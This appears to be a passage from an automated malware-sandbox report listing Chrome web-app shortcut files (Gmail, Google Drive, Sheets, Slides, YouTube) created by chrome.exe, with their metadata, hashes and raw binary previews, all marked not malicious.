                  Preview:L..................F.@.. ...$+.,......n.)...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I,Y.|....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Y.|....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Y.|....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Y.|..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V,Y.|...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........C.)y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 12 14:32:53 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2675
                  Entropy (8bit):4.000148624601767
                  Encrypted:false
                  SSDEEP:
                  MD5:19F3FD822908087F47E9E4A4859EFA6E
                  SHA1:F33DBD1A81BBFCF967868EFAABAC6D5D0EEC29D8
                  SHA-256:5EBC496C142DA7A5135065E9D3AC1232AFB5268BC4C8B2417612C2D5911D78DE
                  SHA-512:77268174CD03B9B8FCB49C5697556FBE6E5F999A3514C205E9BB112835852F1BEC758317FD238AFD8ECE3E7A41A2F6A775B163D52CD39B8957871D7E3810DFD7
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,.... .b.)...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I,Y.|....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Y.|....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Y.|....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Y.|..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V,Y.|...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........C.)y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2689
                  Entropy (8bit):4.010176009814871
                  Encrypted:false
                  SSDEEP:
                  MD5:42BDA2BF6BA74FB21DB3B140910559C6
                  SHA1:B375895C5CEF0323F2ACEBE7E8D8B326871F41CE
                  SHA-256:2622E90875F1346FC632A37852159976DD0E771A5699DDA0945D991938EC3270
                  SHA-512:CC3C7511BD6C7F4A1CA7963948586E0105B600428884EDA5BAE318B5347495A55C976089DE6B08678DA7FEDF0F26C3B57656699A86237BACF24FF287CB6DDB2F
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I,Y.|....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Y.|....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Y.|....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Y.|..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........C.)y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 12 14:32:52 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2677
                  Entropy (8bit):4.001034619651623
                  Encrypted:false
                  SSDEEP:
                  MD5:094CFF00903614FB244D032169465DD7
                  SHA1:8C3E599A6D36A38629A3145E6C2A6419BC93F1C8
                  SHA-256:F201B6B711F1DE83C0CEBED66E97A1DB17F4E847A64E574F6D636DF45B290C9C
                  SHA-512:785944A3D43487E1AD456519E4FDB0E73A1ED8D10B0A4809A99FB5AA4368EFECA6131F8FB5C9E8E53B2159193E5DB0ED25462771F15288C11ABF8F9A553FFD24
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,.....\.)...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I,Y.|....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Y.|....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Y.|....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Y.|..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V,Y.|...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........C.)y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 12 14:32:53 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2677
                  Entropy (8bit):3.990917978707283
                  Encrypted:false
                  SSDEEP:
                  MD5:F56773167385D5A03156BAA8BEE92C56
                  SHA1:AD56F094F1FF36498D029399F9DFAA0501ED2903
                  SHA-256:1E196A35F6CE0397CA81917BEC5DC85C5A5019A1ED8A02BC1D15BC529033F559
                  SHA-512:D815BFC138B59F9E9B3C431363C3C928836F0C3524BF02F915B5076273BBFEB590A73DCA4122F3CC0C97BD547850ACDACBD2E1F601848A0295E6A23A12F50065
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,......h.)...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I,Y.|....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Y.|....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Y.|....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Y.|..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V,Y.|...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........C.)y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 12 14:32:52 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2679
                  Entropy (8bit):3.9978892561512223
                  Encrypted:false
                  SSDEEP:
                  MD5:A592A46897A29CF2A8112310188FB0FA
                  SHA1:8ABA8D48667D0176D7DD431C9678849E076B158D
                  SHA-256:1039714F260945B1B7131984A525E1D493346C80934797839565C599CC9099D2
                  SHA-512:264DADD1F6DB019F3F08647FBF9AD12E3F276408641205E5B7A3A0D869CC19645A65302A77A2AE701B5AAB6CF37D88611B2329242E24EA8E3A67E72C49508823
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,......R.)...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I,Y.|....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Y.|....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Y.|....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Y.|..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V,Y.|...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........C.)y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                  Static File Info

                  No static file info